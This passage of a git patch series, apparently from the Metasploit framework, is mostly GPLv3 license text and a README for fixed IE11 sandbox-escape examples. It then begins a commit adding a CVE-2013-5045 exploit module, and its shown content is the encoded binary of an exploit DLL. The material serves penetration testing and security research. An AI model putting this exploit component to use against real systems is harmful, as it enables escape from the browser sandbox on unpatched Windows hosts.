+ + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. 
This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. 
+ + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. 
If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. 
If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. 
+ + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. 
For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. 
+ + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. 
You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. 
The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. 
+
+ {one line to give the program's name and a brief idea of what it does.}
+ Copyright (C) {year} {name of author}
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see <http://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+ If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+ {project} Copyright (C) {year} {fullname}
+ This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+ You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+<http://www.gnu.org/licenses/>.
+
+ The GNU General Public License does not permit incorporating your program
+into proprietary programs. If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library.
If this is what you want to do, use the GNU Lesser General
+Public License instead of this License. But first, please read
+<http://www.gnu.org/philosophy/why-not-lgpl.html>.
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/README.md b/external/source/exploits/IE11SandboxEscapes/README.md
new file mode 100755
index 0000000000..a51ddd8491
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/README.md
@@ -0,0 +1,10 @@
+IE11SandboxEscapes
+==================
+
+Some example source code for fixed IE11 sandbox escapes.
+
+(c) James Forshaw 2014
+
+For information purposes only.
+
+All files are licensed under GPLv3. See LICENSE for more information.
\ No newline at end of file
From 6e122e683a804ec5ef8ff6a8cce0f7cccd5d0c61 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 29 May 2014 11:42:54 -0500
Subject: [PATCH 403/853] Add module for CVE-2013-5045
---
data/exploits/CVE-2013-5045/CVE-2013-5045.dll | Bin 0 -> 166400 bytes
.../local/ms13_097_ie_registry_symlink.rb | 141 ++++++++++++++++++
2 files changed, 141 insertions(+)
create mode 100755 data/exploits/CVE-2013-5045/CVE-2013-5045.dll
create mode 100644 modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
diff --git a/data/exploits/CVE-2013-5045/CVE-2013-5045.dll b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll new file mode 100755 index 0000000000000000000000000000000000000000..3f912623885f6490ea79e3470401177a66f4418e GIT binary patch literal 166400 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 
